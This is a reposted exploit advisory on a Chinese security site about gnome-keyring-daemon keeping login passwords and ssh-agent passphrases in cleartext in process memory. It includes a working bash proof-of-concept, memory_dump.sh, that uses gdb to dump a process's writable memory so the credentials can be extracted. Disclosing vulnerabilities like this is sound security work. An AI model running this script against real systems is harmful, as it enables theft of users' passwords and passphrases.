首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gnome Keyring Daemon Credential Disclosure
来源:lucaercoli.it 作者:Ercoli 发布时间:2017-04-25  
gnome-keyring-daemon is vulnerable to local credentials disclosure.


Fortunately the attack can be spun on already compromised machines,
but sadly, in those cases, an attacker can leaverage on
gnome-keyring-daemon to obtain sensible data. 

The application store
password of logged users in clear text in the process memory, hence
expose this information (such of login password, passphrase of
ssh-agent, etc.) to an attacker. 

In this scenario, he can read those
data instantly without cracking it or install keylogger, sniffer and
variuos tools, but using gnome-keyring-daemon in order to obtain this
informations, that can be extracted from memory using a debugger (such
of "gdb"). 

At this URL, there is a script (named "memory_dump.sh")
that can be used as PoC: 

http://www.lucaercoli.it/ 
 
memory_dump.sh:

#!/bin/bash

mkdir $1
cd $1
grep rw-p /proc/$1/maps  \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy MOV Converter 1.4.24 - Lo
·WePresent WiPG-1000 Command In
·SquirrelMail < 1.4.22 - Remote
·Disk Sorter Enterprise 9.5.12
·VirtualBox 5.1.14 r112924 - Un
·Microsoft Office Word Maliciou
·Microsoft Windows 10 10586 - I
·PrivateTunnel Client 2.8 - Loc
·Apple WebKit / Safari 10.0.2(1
·Dell Customer Connect 1.3.28.0
·Apple WebKit / Safari 10.0.2(1
·LightDM (Ubuntu 16.04/16.10) -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved